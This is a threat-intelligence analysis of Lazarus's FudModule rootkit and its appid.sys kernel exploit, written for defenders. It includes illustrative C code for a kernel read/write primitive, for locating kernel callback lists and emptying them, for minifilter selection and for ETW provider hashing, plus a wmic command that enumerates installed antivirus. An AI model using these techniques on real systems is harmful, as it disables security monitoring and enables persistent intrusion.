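            RTL_PROCESS_MODULE_INFORMATION *m = &mods->Modules[i];
            if (_stricmp((const char *)m->FullPathName + m->OffsetToFileName, name) == 0) {
                base = m->ImageBase;
                break;
            }
        }
    }
    free(mods);
    return base;
}

int main(void) {
    // The exploit resolves these three modules before doing anything else.
    printf("ntoskrnl.exe @ %p\n", GetKernelModuleBase("ntoskrnl.exe"));
    printf("netio.sys    @ %p\n", GetKernelModuleBase("netio.sys"));
    printf("fltmgr.sys   @ %p\n", GetKernelModuleBase("fltmgr.sys"));
    return 0;
}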

Since the appid.sys driver does not have to be already loaded on the target machine, the exploit may first have to load it itself. It chooses to accomplish this in an indirect way, by writing an event to one specific AppLocker-related ETW (Event Tracing for Windows) provider. Once appid.sys is loaded, the exploit impersonates the local service account using a direct syscall to NtSetInformationThread with the ThreadImpersonationToken thread information class. By impersonating local service, it can now obtain a read/write handle to \Device\AppId. With this handle, the exploit finally prepares the IOCTL input buffer and triggers the vulnerability using the NtDeviceIoControlFile syscall.  

Direct syscalls are heavily used throughout the exploit. 

The exploit crafts the IOCTL input buffer in such a way that the vulnerable callback is essentially a gadget that performs a 64-bit copy from the IOCTL input buffer to an arbitrary target address. This address was chosen to corrupt the PreviousMode of the current thread. By ensuring the corresponding source byte in the IOCTL input buffer is zero, the copy will clear the PreviousMode field, effectively resulting in its value being interpreted as KernelMode. Targeting PreviousMode like this is a widely popular exploitation technique, as corrupting this one byte in the KTHREAD structure bypasses kernel-mode checks inside syscalls such as NtReadVirtualMemory or NtWriteVirtualMemory, allowing a user-mode attacker to read and write arbitrary kernel memory. Note that while this technique was mitigated on some Windows Insider Builds, this mitigation has yet to reach general availability at the time of writing. 

Interestingly, the exploit may attempt to trigger the vulnerable IOCTL twice. This is due to an extra argument that was added in Win11 22H2. As a result, the IOCTL handler on newer builds expects the input buffer to be 0x20 bytes in size while, previously, the expected size was only 0x18. Rather than selecting the proper input buffer size for the current build, the exploit just tries calling the IOCTL twice: first with an input buffer of size 0x18 and then, if not successful, with size 0x20. This is a valid approach since the IOCTL handler's first action is to check the input buffer size, and if it doesn't match the expected size, it immediately returns STATUS_INVALID_PARAMETER.  

To check if it was successful, the exploit employs the NtWriteVirtualMemory syscall, attempting to read the current thread’s PreviousMode (Lazarus avoids using NtReadVirtualMemory, more on this later). If the exploit succeeded, the syscall should return STATUS_SUCCESS, and the leaked PreviousMode byte should equal 0 (meaning KernelMode). Otherwise, the syscall should return an error status code, as it should be impossible to read kernel memory without a corrupted PreviousMode.  

In our exploit analysis, we deliberately chose to omit some key details, such as the choice of the callback gadget function. This decision was made to strike the right balance between helping defenders with detection but not making exploitation too widely accessible. For those requiring more information for defensive purposes, we may be able to share additional details on a case-by-case basis. 

The FudModule Rootkit

The entire goal of the admin-to-kernel exploit was to corrupt the current thread’s PreviousMode. This allows for a powerful kernel read/write primitive, where the affected user-mode thread can read and write arbitrary kernel memory using the Nt(Read|Write)VirtualMemory syscalls. Armed with this primitive, the FudModule rootkit employs direct kernel object manipulation (DKOM) techniques to disrupt various kernel security mechanisms. It’s worth reiterating that FudModule is a data-only rootkit, meaning it executes entirely from user space and all the kernel tampering is performed through the read/write primitive.  

The first variants of the FudModule rootkit were independently discovered by AhnLab and ESET research teams, with both publishing detailed analyses in September 2022. The rootkit was named after the FudModule.dll string used as the name in its export table. While this artifact is not present anymore, there is no doubt that what we found is an updated version of the same rootkit. AhnLab’s report documented a sample from early 2022, which incorporated seven data-only rootkit techniques and was enabled through a BYOVD exploit for ene.sys. ESET’s report examined a slightly earlier variant from late 2021, also featuring seven rootkit techniques but exploiting a different BYOVD vulnerability in dbutil_2_3.sys. In contrast, our discovery concerns a sample featuring nine rootkit techniques and exploiting a previously unknown admin-to-kernel vulnerability. Out of these nine techniques, four are new, three are improved, and two remain unchanged from the previous variants. This leaves two of the original seven techniques, which have been deprecated and are no longer present in the latest variant. 

Each rootkit technique is assigned a bit, ranging from 0x1 to 0x200 (the 0x20 bit is left unused in the current variant). FudModule executes the techniques sequentially, in an ascending order of the assigned bits. The bits are used to report on the success of the individual techniques. During execution, FudModule will construct an integer value (named bitfield_techniques in the decompilation below), where only the bits corresponding to successfully executed techniques will be set. This integer is ultimately written to a file named tem1245.tmp, reporting on the rootkit’s success. Interestingly, we did not find this filename referenced in any other Lazarus sample, suggesting the dropped file is only inspected through hands-on-keyboard activity, presumably through a RAT (Remote Access Trojan) command. This supports our beliefs that FudModule is only loosely integrated into the rest of Lazarus’ malware ecosystem and that Lazarus is very careful about using the rootkit, only deploying it on demand under the right circumstances. 

The rootkit’s “main” function, executing the individual rootkit techniques. Note the missing 0x20 technique. 

Based on the large number of updates, it seems that FudModule remains under active development. The latest variant appears more robust, avoiding some potentially problematic practices from the earlier variants. Since some techniques target undocumented kernel internals in a way that we have not previously encountered, we believe that Lazarus must be conducting their own kernel research. Further, though the rootkit is certainly technically sophisticated, we still identified a few bugs here and there. These may either limit the rootkit’s intended functionality or even cause kernel bug checks under the right conditions. While we find some of these bugs very interesting and would love to share the details, we do not enjoy the idea of providing free bug reports to threat actors, so we will hold onto them for now and potentially share some information later if the bugs get fixed. 

Interestingly, FudModule utilizes the NtWriteVirtualMemory syscall for both reading and writing kernel memory, eliminating the need to call NtReadVirtualMemory. This leverages the property that, when limited to a single virtual address space, NtReadVirtualMemory and NtWriteVirtualMemory are basically inverse operations with respect to the values of the source Buffer and the destination BaseAddress arguments. In other words, writing to kernel memory can be thought of as writing from a user-mode Buffer to a kernel-mode BaseAddress, while reading from kernel memory can conversely be achieved by swapping the arguments, that is, writing from a kernel-mode Buffer to a user-mode BaseAddress. Lazarus' implementation takes advantage of this, which seems to be an intentional design decision since most developers would likely prefer the more straightforward approach of using NtReadVirtualMemory for reading kernel memory and NtWriteVirtualMemory for writing it. We can only guess why Lazarus chose this approach, but it might be yet another stealth-enhancing feature: with their implementation, they only have to use one suspicious syscall instead of two, potentially reducing the number of detection opportunities. 
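
As an illustration of this inverse-operation trick, the following minimal C sketch shows what such a primitive could look like once PreviousMode has already been corrupted to KernelMode. It goes through the standard ntdll export rather than direct syscalls and is a simplified illustration under those assumptions, not the actual implementation.

// Both kernel read and kernel write implemented through NtWriteVirtualMemory only,
// mirroring the approach described above. Link against ntdll.lib. These calls only
// succeed against kernel addresses after the current thread's PreviousMode has been
// corrupted; otherwise the kernel rejects them.
#include <windows.h>
#include <winternl.h>

EXTERN_C NTSTATUS NTAPI NtWriteVirtualMemory(
    HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer,
    SIZE_T NumberOfBytesToWrite, PSIZE_T NumberOfBytesWritten);

// Write: user-mode Buffer -> kernel-mode BaseAddress (the "normal" direction).
static NTSTATUS KernelWrite(PVOID kernelDst, const void *userSrc, SIZE_T size) {
    SIZE_T written = 0;
    return NtWriteVirtualMemory(GetCurrentProcess(), kernelDst,
                                (PVOID)userSrc, size, &written);
}

// Read: kernel-mode address -> user-mode buffer, achieved by simply swapping the
// roles of BaseAddress and Buffer in the very same syscall.
static NTSTATUS KernelRead(void *userDst, PVOID kernelSrc, SIZE_T size) {
    SIZE_T written = 0;
    return NtWriteVirtualMemory(GetCurrentProcess(), userDst,
                                kernelSrc, size, &written);
}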

Debug Prints 

Before we delve into the actual rootkit techniques, there is one last thing worth discussing. To our initial surprise, Lazarus left a handful of plaintext debug prints in the compiled code. Such prints are typically one of the best things that can happen to a malware researcher, because they tend to accelerate the reverse engineering process significantly. In this instance, however, some of the prints had the opposite effect, sometimes even making us question if we understood the code correctly.  

As an example, let us mention the string get rop function addresses failed. Assuming rop stands for return-oriented programming, this string would make perfect sense in the context of exploitation, if not for the fact that not a single return address was corrupted in the exploit.  

Plaintext debug strings found in the rootkit. The term vaccine is used to refer to security software. 

While written in English, the debug strings suggest their authors are not native speakers, occasionally even pointing to their supposed Korean origin. This is best seen in the frequent usage of the term vaccine throughout the rootkit. This had us scratching our heads at first, because it was unclear how vaccines would relate to the rootkit functionality. However, it soon became apparent that the term was used to refer to security software. This might originate from a common Korean translation of antivirus (바이러스 백신), a compound word with the literal meaning virus vaccine. Note that even North Korea's "own" antivirus was called SiliVaccine, and to the best of our knowledge, the term vaccine would not be used like this in other languages such as Japanese. Additionally, this is not the first time Korean-speaking threat actors have used this term. For instance, AhnLab's recent report on Kimsuky mentions the following telltale command: 
 
cmd.exe /U /c wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayname > vaccine.txt

Another puzzle is the abbreviation pvmode, which we believe refers to PreviousMode. A Google search for pvmode yields exactly zero relevant results, and we suspect most English speakers would choose different abbreviations, such as prvmode or prevmode. However, after consulting this with language experts, we learned that using the abbreviation pvmode would be unusual for Korean speakers too. 

Finally, there is also the debug message disableV3Protection passed. Judging from the context, the rather generic term V3 here refers to AhnLab V3 Endpoint Security. Considering the geopolitical situation, North Korean hacker groups are likely well-acquainted with South Korean AhnLab, so it would make perfect sense that they internally refer to them using such a non-specific shorthand. 

0x01 – Registry Callbacks 

The first rootkit technique is designed to address registry callbacks. This is a documented Windows mechanism which allows security solutions to monitor registry operations. A security solution’s kernel-mode component can call the CmRegisterCallbackEx routine to register a callback, which gets notified whenever a registry operation is performed on the system. What’s more, since the callback is invoked synchronously, before (or after) the actual operation is performed, the callback can even block or modify forbidden/malicious operations. FudModule’s goal here is to remove existing registry callbacks and thus disrupt security solutions that rely on this mechanism. 

The callback removal itself is performed by directly modifying some internal data structures managed by the kernel. This was also the case in the previous version, as documented by ESET and AhnLab. There, the rootkit found the address of nt!CallbackListHead (which contains a doubly linked, circular list of all existing registry callbacks) and simply emptied it by pointing it to itself. 

In the current version of FudModule, this technique was improved to leave some selected callbacks behind, perhaps making the rootkit stealthier. This updated version starts the same as the previous one: by finding the address of nt!CallbackListHead. This is done by resolving CmUnRegisterCallback (this resolution is performed by name, through iterating over the export table of ntoskrnl in memory), scanning its function body for the lea rcx,[nt!CallbackListHead] instruction, and then calculating the final address from the offset extracted from the instruction’s opcodes. 
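
The following small C sketch shows the general idea behind this instruction-scanning trick: locating a RIP-relative lea rcx, [rip+disp32] (opcode bytes 48 8D 0D) and reconstructing the absolute address it references. The opcode pattern and the lack of a real disassembler are simplifications for illustration; the actual rootkit matches the specific instruction present in CmUnRegisterCallback on each supported build.

// Illustrative sketch: recover the absolute target of the first "lea rcx, [rip+disp32]"
// found in a function body. `func` points at the routine's bytes (e.g. in a user-mode
// mapped copy of ntoskrnl); the caller then rebases the result onto the leaked kernel base.
#include <stdint.h>
#include <stddef.h>
#include <string.h>

static uint64_t FindLeaRcxTarget(const uint8_t *func, size_t len) {
    for (size_t i = 0; i + 7 <= len; i++) {
        if (func[i] == 0x48 && func[i + 1] == 0x8D && func[i + 2] == 0x0D) {
            int32_t disp;
            memcpy(&disp, &func[i + 3], sizeof(disp));
            // RIP-relative addressing: target = address of the next instruction + displacement.
            return (uint64_t)(uintptr_t)(func + i + 7) + (int64_t)disp;
        }
    }
    return 0;
}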

With the nt!CallbackListHead address, FudModule can iterate over the registry callback linked list. It inspects each entry and determines if the callback routine is implemented in ntoskrnl.exe, applockerfltr.sys, or bfs.sys. If it is, the callback is left untouched. Otherwise, the rootkit replaces the callback routine pointer with a pointer to ObIsKernelHandle and then proceeds to unlink the callback entry. 

0x02 – Object Callbacks 

Object callbacks allow drivers to execute custom code in response to thread, process, and desktop handle operations. They are often used in self-defense, as they represent a convenient way to protect critical processes from being tampered with. Since the protection is enforced at the kernel level, this should protect even against elevated attackers, as long as they stay in user mode. Alternatively, object callbacks are also useful for monitoring and detecting suspicious activity.  

Whatever the use case, object callbacks can be set up using the ObRegisterCallbacks routine. FudModule naturally attempts to do the exact opposite: that is to remove all registered object callbacks. This could let it bypass self-defense mechanisms and evade object callback-based detection/telemetry. 

The implementation of this rootkit technique has stayed the same since the previous version, so there is no need to go into too much detail. First, the rootkit scans the body of the ObGetObjectType routine to obtain the address of nt!ObTypeIndexTable. This contains an array of pointers to _OBJECT_TYPE structures, each of which represents a distinct object type, such as Process, Token, or SymbolicLink. FudModule iterates over this array (skipping the first two special-meaning elements) and inspects each _OBJECT_TYPE.CallbackList, which contains a doubly linked list of object callbacks registered for the particular object type. The rootkit then empties the CallbackList by making each node’s forward and backward pointer point to itself. 
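
Conceptually, the list-emptying operation used here (and for the registry callbacks earlier) boils down to two 64-bit kernel writes, as in the C sketch below. The write64 callback stands in for the kernel-write primitive (such as the NtWriteVirtualMemory-based helper sketched earlier), and the offsets assume a standard two-pointer LIST_ENTRY layout.

// Empty a kernel doubly linked list by making head.Flink and head.Blink point to the
// head itself, so any kernel code walking the list sees it as empty.
#include <stdint.h>
#include <stdbool.h>

typedef bool (*KernelWrite64Fn)(uint64_t kernelAddress, uint64_t value);

static bool EmptyKernelListHead(uint64_t listHeadAddress, KernelWrite64Fn write64) {
    return write64(listHeadAddress, listHeadAddress)        // Flink = &head
        && write64(listHeadAddress + 8, listHeadAddress);   // Blink = &head
}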

0x04 – Process, Thread, and Image Kernel Callbacks 

This next rootkit technique is designed to disable three more types of kernel callbacks: process, thread, and image callbacks. As their names suggest, these are used to execute custom kernel code whenever a new process is created, a new thread spawned, or a new image loaded (e.g. a DLL loaded into a process). These callbacks are extremely useful for detecting malicious activity. For instance, process callbacks allow AVs and EDRs to perform various checks on each new process that is to be created. Registering these callbacks is very straightforward. All that is needed is to pass the new callback routine as an argument to PsSetCreateProcessNotifyRoutine, PsSetCreateThreadNotifyRoutine, or PsSetLoadImageNotifyRoutine. These routines also come in their updated Ex variants, or even Ex2 in the case of PsSetCreateProcessNotifyRoutineEx2

Process, thread, and image callbacks are managed by the kernel in an almost identical way, which allows FudModule to use essentially the same code to disable all three of them. We find that this code has not changed much since the previous version, with the main difference being new additions to the list of drivers whose callbacks are left untouched.  

FudModule first finds the addresses of nt!PspNotifyEnableMask, nt!PspLoadImageNotifyRoutine, nt!PspCreateThreadNotifyRoutine, and nt!PspCreateProcessNotifyRoutine. These are once again obtained by scanning the code of exported routines, with the exact scanning method subject to some variation based on the Windows build number. Before any modification is performed, the rootkit clears nt!PspNotifyEnableMask and sleeps for a brief amount of time. This mask contains a bit field of currently enabled callback types, so clearing it disables all callbacks. While some EDR bypasses would stop here, FudModule’s goal is not to disable all callbacks indiscriminately, so the modification of nt!PspNotifyEnableMask is only temporary, and FudModule eventually restores it back to its original value. We believe the idea behind this temporary modification is to decrease the chance of a race condition that could potentially result in a bug check. 

All three of the above nt!Psp(LoadImage|CreateThread|CreateProcess)NotifyRoutine globals are organized as an array of _EX_FAST_REF pointers to _EX_CALLBACK_ROUTINE_BLOCK structures (at least that’s the name used in ReactOS, Microsoft does not share a symbol name here). FudModule iterates over all these structures and checks if _EX_CALLBACK_ROUTINE_BLOCK.Function (the actual callback routine pointer) is implemented in one of the below-whitelisted modules. If it is, the pointer will get appended to a new array that will be used to replace the original one. This effectively removes all callbacks except for those implemented in one of the below-listed modules. 

ntoskrnl.exe, ahcache.sys, mmcss.sys, cng.sys, ksecdd.sys, tcpip.sys, iorate.sys, ci.dll, dxgkrnl.sys, peauth.sys, wtd.sys 
Kernel modules that are allowed during the removal of process, thread, and image callbacks. 
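
For illustration, walking such a callback array could look like the C sketch below, assuming the conventional x64 _EX_FAST_REF encoding (the low 4 bits of each slot hold an embedded reference count, the remaining bits form the pointer) and the _EX_CALLBACK_ROUTINE_BLOCK layout known from public sources such as ReactOS. These layout details are assumptions taken from public research, not code recovered from the rootkit.

// Walk a copy of one of the nt!PspCreate*NotifyRoutine arrays (read out beforehand via
// the kernel-read primitive) and report the callback block pointers of populated slots.
#include <stdint.h>
#include <stdio.h>

#define EX_FAST_REF_MASK 0xFULL

static uint64_t ExFastRefGetObject(uint64_t fastRef) {
    return fastRef & ~EX_FAST_REF_MASK;   // strip the embedded reference count
}

static void DumpCallbackBlocks(const uint64_t *slots, unsigned count) {
    for (unsigned i = 0; i < count; i++) {
        uint64_t block = ExFastRefGetObject(slots[i]);
        if (block != 0)
            printf("slot %u -> _EX_CALLBACK_ROUTINE_BLOCK at 0x%llx (Function member follows the rundown ref)\n",
                   i, (unsigned long long)block);
    }
}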

0x08 – Minifilter Drivers 

File system minifilters provide a mechanism for drivers to intercept file system operations. They are used in a wide range of scenarios, including encryption, compression, replication, monitoring, antivirus scanning, or file system virtualization. For instance, an encryption minifilter would encrypt the data before it is written to the storage device and, conversely, decrypt the data after it is read. FudModule is trying to get rid of all the monitoring and antivirus minifilters while leaving the rest untouched (after all, some minifilters are crucial to keep the system running). The choice about which minifilters to keep and which to remove is based mainly on the minifilter’s altitude, an integer value that is used to decide the processing order in case there are multiple minifilters attached to the same operation. Microsoft defines altitude ranges that should be followed by well-behaved minifilters. Unfortunately, these ranges also represent a very convenient way for FudModule to distinguish anti-malware minifilters from the rest. 

In its previous version, FudModule disabled minifilters by directly patching their filter functions’ prologues. This would be considered very unusual today, with HVCI (Hypervisor-Protected Code Integrity) becoming more prevalent, even turned on by default on Windows 11. Since HVCI is a security feature designed to prevent the execution of arbitrary code in the kernel, it would stand in the way of FudModule trying to patch the filter function. This forced Lazarus to completely reimplement this rootkit technique, so the current version of FudModule disables file system minifilters in a brand-new data-only attack. 

This attack starts by resolving FltEnumerateFilters and using it to find FltGlobals.FrameList.rList. This is a linked list of FLTMGR!_FLTP_FRAME structures, each representing a single filter manager frame. From here, FudModule follows another linked list at _FLTP_FRAME.AttachedVolumes.rList. This linked list consists of FLTMGR!_FLT_VOLUME structures, describing minifilters attached to a particular file system volume. Interestingly, the rootkit performs a sanity check to make sure that the pool tag associated with the _FLT_VOLUME allocation is equal to FMvo. With the sanity check satisfied, FudModule iterates over _FLT_VOLUME.Callbacks.OperationsLists, which is an array of linked lists of FLTMGR!_CALLBACK_NODE structures, indexed by IRP major function codes. For instance, OperationsLists[IRP_MJ_READ] is a linked list describing all filters attached to the read operation on a particular volume. 

FudModule making sure the pool tag of a _FLT_VOLUME chunk is equal to FMvo

For each _CALLBACK_NODE, FudModule obtains the corresponding FLTMGR!_FLT_INSTANCE and FLTMGR!_FLT_FILTER structures and uses them to decide whether to unlink the callback node. The first check is based on the name of the driver behind the filter. If it is hmpalert.sys (associated with the HitmanPro anti-malware solution), the callback will get immediately unlinked. Conversely, the callback is preserved if the driver’s name matches an entry in the following list: 

bindflt.sys, storqosflt.sys, wcifs.sys, cldflt.sys, filecrypt.sys, luafv.sys, npsvctrig.sys, wof.sys, fileinfo.sys, applockerfltr.sys, bfs.sys 
Kernel modules that are allowlisted to preserve their file system minifilters.

If there was no driver name match, FudModule uses _FLT_FILTER.DefaultAltitude to make its ultimate decision. Callbacks are unlinked if the default altitude belongs either to the range [320000, 329999] (defined as FSFilter Anti-Virus by Microsoft) or the range [360000, 389999] (FSFilter Activity Monitor). Besides unlinking the callback nodes, FudModule also wipes the whole _FLT_INSTANCE.CallbackNodes array in the corresponding _FLT_INSTANCE structures. 
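
The altitude-based decision itself is simple enough to capture in a few lines of C, as sketched below. The two numeric ranges come straight from the text above; treating the altitude as a NUL-terminated wide string parsed with wcstol is an implementation assumption for illustration.

// Decide whether a minifilter with the given default altitude falls into one of the
// anti-malware altitude ranges and would therefore have its callback nodes unlinked.
#include <wchar.h>
#include <stdbool.h>
#include <stdlib.h>

static bool ShouldUnlinkByAltitude(const wchar_t *defaultAltitude) {
    long alt = wcstol(defaultAltitude, NULL, 10);
    bool antiVirus       = (alt >= 320000 && alt <= 329999); // FSFilter Anti-Virus
    bool activityMonitor = (alt >= 360000 && alt <= 389999); // FSFilter Activity Monitor
    return antiVirus || activityMonitor;
}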

0x10 – Windows Filtering Platform 

Windows Filtering Platform (WFP) is a documented set of APIs designed for host-based network traffic filtering. The WFP API offers capabilities for deep packet inspection as well as for modification or dropping of packets at various layers of the network stack. This is very useful functionality, so it serves as a foundation for a lot of Windows network security software, including intrusion detection/prevention systems, firewalls, and network monitoring tools. The WFP API is accessible both in user and kernel space, with the kernel part offering more powerful functionality. Specifically, the kernel API allows for installing so-called callout drivers, which can essentially hook into the network stack and perform arbitrary actions on the processed network traffic. FudModule is trying to interfere with the installed callout routines in an attempt to disrupt the security they provide.  

This rootkit technique is executed only when Kaspersky drivers (klam.sys, klif.sys, klwfp.sys, klwtp.sys, klboot.sys) are present on the targeted system and at the same time Symantec/Broadcom drivers (symevnt.sys, bhdrvx64.sys, srtsp64.sys) are absent. This check appears to be a new addition in the current version of FudModule. In other aspects, our analysis revealed that the core idea of this technique matches the findings described by ESET researchers during their analysis of the previous version. 

Initially, FudModule resolves netio!WfpProcessFlowDelete to locate the address of netio!gWfpGlobal. As the name suggests, this is designed to store WFP-related global variables. Although its exact layout is undocumented, it is not hard to find the build-specific offset where a pointer to an array of WFP callout structures is stored (with the length of this array stored at an offset immediately preceding the pointer). FudModule follows this pointer and iterates over the array, skipping all callouts implemented in ndu.sys, tcpip.sys, mpsdrv.sys, or wtd.sys. For the remaining callouts, FudModule accesses the callout structure’s flags and sets the flag stored in the least significant bit. While the callout structure itself is undocumented, this particular 0x01 flag is documented in another structure, where it is called FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW. The documentation reads “if this flag is specified, the filter engine calls the callout driver’s classifyFn2 callout function only if there is a context associated with the data flow”. In other words, setting this flag will conditionally disable the callout in cases where no flow context is available (see the implementation of netio!IsActiveCallout below). 

The meaning of the FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW flag can be nicely seen in netio!IsActiveCallout. If this flag is set and no flow context can be obtained, IsActiveCallout will return false (see the highlighted part of the condition). 

While this rootkit technique has the potential to interfere with some WFP callouts, it will not be powerful enough to disrupt all of them. Many WFP callouts registered by security vendors already have the FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW flag set by design, so they will not be affected by this technique at all. Given the initial driver check, it seems like this technique might be targeted directly at Kaspersky. While Kaspersky does install dozens of WFP callouts, about half of those are designed for processing flows and already have the FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW flag set. Since we refrained from reverse engineering our competitor’s products, the actual impact of this rootkit technique remains unclear. 

0x20 – Missing 

So far, the rootkit techniques we analyzed were similar to those detailed by ESET in their paper on the earlier rootkit variant. But starting from now, we are getting into a whole new territory. The 0x20 technique, which used to deal with Event Tracing for Windows (ETW), has been deprecated, leaving the 0x20 bit unused. Instead, there are two new replacement techniques that target ETW, indexed with the bits 0x40 and 0x80. The indexing used to end at 0x40, which was a technique to obstruct forensic analysis by disabling prefetch file creation. However, now the bits go all the way up to 0x200, with two additional new techniques that we will delve into later in this blog. 

0x40 – Event Tracing for Windows: System Loggers

Event Tracing for Windows (ETW) serves as a high-performance mechanism dedicated to tracing and logging events. In a nutshell, its main purpose is to connect providers (who generate some log events) with consumers (who process the generated events). Consumers can define which events they would like to consume, for instance, by selecting some specific providers of interest. There are providers built into the operating system, like Microsoft-Windows-Kernel-Process which generates process-related events, such as process creation or termination. However, third-party applications can also define their custom providers.  

While many built-in providers are not security-related, some generate events useful for detection purposes. For instance, the Microsoft-Windows-Threat-Intelligence provider makes it possible to watch for suspicious events, such as writing another process’ memory. Furthermore, various security products take advantage of ETW by defining their custom providers and consumers. FudModule tampers with ETW internals in an attempt to intercept suspicious events and thus evade detection. 

The main idea behind this rootkit technique is to disable system loggers by zeroing out EtwpActiveSystemLoggers. The specific implementation of how this address is found varies based on the target Windows version. On newer builds, the nt!EtwSendTraceBuffer routine is resolved first and used to find nt!EtwpHostSiloState. This points to an _ETW_SILODRIVERSTATE structure, and using a hardcoded build-specific offset, the rootkit can access _ETW_SILODRIVERSTATE.SystemLoggerSettings.EtwpActiveSystemLoggers. On older builds, the rootkit first scans the entire ntoskrnl .text section, searching for opcode bytes specific to the EtwTraceKernelEvent prologue. The rootkit then extracts the target address from the mov ebx, cs:EtwpActiveSystemLoggers instruction that immediately follows. 

To understand the technique’s impact, we can take a look at how EtwpActiveSystemLoggers is used in the kernel. Accessed on a bit-by-bit basis, its least significant eight bits might be set in the EtwpStartLogger routine. This indicates that the value itself is a bit field, with each bit signifying whether a particular system logger is active. Looking at the other references to EtwpActiveSystemLoggers, a clear pattern emerges. After its value is read, there tends to be a loop guarded by a bsf instruction (bit scan forward). Inside the loop tends to be a call to an ETW-related routine that might generate a log event. The purpose of this loop is to iterate over the set bits of EtwpActiveSystemLoggers. When the rootkit clears all the bits, the body of the loop will never get executed, meaning the event will not get logged. 

Example decompilation of EtwpTraceKernelEventWithFilter. After the rootkit zeroes out EtwpActiveSystemLoggers, EtwpLogKernelEvent will never get called from inside the loop since the condition guarding the loop will always evaluate to zero. 
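
To illustrate why zeroing the bit field is enough, the kernel-side pattern just described can be approximated with the small C sketch below. The names are paraphrased and the loop is a simplification of the decompiled logic; once the mask is cleared, the bit scan never finds a set bit and the logging call in the loop body is never reached.

// Approximation of the "bsf-guarded" logging loop built around EtwpActiveSystemLoggers.
#include <intrin.h>

static unsigned long EtwpActiveSystemLoggers; // zeroed by the rootkit via the kernel-write primitive

static void LogKernelEventForActiveLoggers(void *event) {
    unsigned long remaining = EtwpActiveSystemLoggers;
    unsigned long index;
    // Iterate over the set bits: each bit corresponds to one active system logger.
    while (_BitScanForward(&index, remaining)) {
        remaining &= ~(1UL << index);
        // EtwpLogKernelEvent(index, event);  // never executed once the mask is zero
        (void)event;
    }
}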

0x80 – Event Tracing for Windows: Provider GUIDs 

Complementing the previous technique, the 0x80 technique is also designed to blind ETW, however using a different approach. While the 0x40 technique was quite generic – aiming to disable all system loggers – this technique operates in a more surgical fashion. It contains a hardcoded list of 95 GUIDs, each representing an identifier for some specific ETW provider. The rootkit iterates over all these GUIDs and attempts to disable the respective providers. While this approach requires the attackers to invest some effort into assembling the list of GUIDs, it also offers them a finer degree of control over which ETW providers they will eventually disrupt. This allows them to selectively target providers that pose a higher detection risk and ignore the rest to minimize the rootkit’s impact on the target system. 

This technique starts by obtaining the address of EtwpHostSiloState (or EtwSiloState on older builds). If EtwpHostSiloState was already resolved during the previous technique, the rootkit just reuses the address. If not, the rootkit follows the reference chain PsGetCurrentServerSiloName -> PsGetCurrentServerSiloGlobals -> PspHostSiloGlobals -> EtwSiloState. In both scenarios, the result is that the rootkit just obtained a pointer to an _ETW_SILODRIVERSTATE structure, which contains a member named EtwpGuidHashTable. As the name suggests, this is a hash table holding ETW GUIDs (_ETW_GUID_ENTRY).  

FudModule then iterates over its hardcoded list of GUIDs and attempts to locate each of them in the hash table. Although the hash table internals are officially undocumented, Yarden Shafir provided a nice description in her blog on exploiting an ETW vulnerability. In a nutshell, the hash is computed by just splitting the 128-bit GUID into four 32-bit parts and XORing them together. By ANDing the hash with 0x3F, an index of the relevant hash bucket (_ETW_HASH_BUCKET) can be obtained. The bucket contains three linked lists of _ETW_GUID_ENTRY structures, each designated for a different type of GUIDs. FudModule always opts for the first one (EtwTraceGuidType) and traverses it, looking for the relevant _ETW_GUID_ENTRY structure. 
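
The hashing scheme is simple enough to reproduce in a few lines of C, shown below with the Microsoft-Windows-Threat-Intelligence provider mentioned earlier used as the example GUID.

// Compute the EtwpGuidHashTable bucket index for a provider GUID: XOR the four 32-bit
// words of the GUID together and mask with 0x3F (64 buckets).
#include <windows.h>
#include <stdio.h>

static ULONG EtwGuidBucketIndex(const GUID *guid) {
    const ULONG *words = (const ULONG *)guid;  // treat the 128-bit GUID as four 32-bit words
    ULONG hash = words[0] ^ words[1] ^ words[2] ^ words[3];
    return hash & 0x3F;
}

int main(void) {
    // Microsoft-Windows-Threat-Intelligence: {F4E1897C-BB5D-5668-F1D8-040F4D8DD344}
    GUID threatIntel = { 0xF4E1897C, 0xBB5D, 0x5668,
                         { 0xF1, 0xD8, 0x04, 0x0F, 0x4D, 0x8D, 0xD3, 0x44 } };
    printf("bucket index: %lu\n", EtwGuidBucketIndex(&threatIntel));
    return 0;
}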

With a pointer to _ETW_GUID_ENTRY corresponding to a GUID of interest, FudModule proceeds to clear _ETW_GUID_ENTRY.ProviderEnableInfo.IsEnabled. The purpose of this modification seems self-explanatory: FudModule is trying to disable the ETW provider. To better understand how this works, let’s examine nt!EtwEventEnabled (see the decompiled code below). This is a routine that often serves as an if condition before nt!EtwWrite (or nt!EtwWriteEx) gets called.  

Looking at the decompilation, there are two return 1 statements. Setting ProviderEnableInfo.IsEnabled to zero ensures that the first one is never reached. However, the second return statement could still potentially execute. To make sure this doesn’t happen, the rootkit also iterates over all _ETW_REG_ENTRY structures from the _ETW_GUID_ENTRY.RegListHead linked list. For each of them, it makes a single doubleword write to zero out four masks, namely EnableMask, GroupEnableMask, HostEnableMask, and HostGroupEnableMask (or only EnableMask and GroupEnableMask on older builds, where the latter two masks were not yet introduced).  

Decompilation of nt!EtwEventEnabled. After the rootkit has finished its job, this routine will always return false for events related to the targeted GUIDs. This is because the rootkit cleared both _ETW_GUID_ENTRY.ProviderEnableInfo.IsEnabled and _ETW_REG_ENTRY.GroupEnableMask, forcing the highlighted conditions to fail. 

Clearing these masks also has an additional effect beyond making EtwEventEnabled always return false. All four masks are also checked in EtwWriteEx, so this modification effectively neutralizes that routine as well: when no mask is set for a particular event registration object, execution never proceeds to the lower-level routine (nt!EtwpEventWriteFull) where the bulk of the actual event-writing logic is implemented. 

0x100 – Image Verification Callbacks 

Image verification callbacks are yet another callback mechanism disrupted by FudModule. Designed similarly to process/thread/image callbacks, image verification callbacks are supposed to get invoked whenever a new driver image is loaded into kernel memory. This represents useful functionality for anti-malware software, which can leverage them to blocklist known malicious or vulnerable drivers (though there might be some problems with this blocking approach as the callbacks get invoked asynchronously). Furthermore, image verification callbacks also offer a valuable source of telemetry, providing visibility into suspicious driver load events. The callbacks can be registered using the SeRegisterImageVerificationCallback routine, which is publicly undocumented. As a result of this undocumented nature, the usage here is limited mainly to deep-rooted anti-malware software. For instance, Windows Defender registers a callback named WdFilter!MpImageVerificationCallback

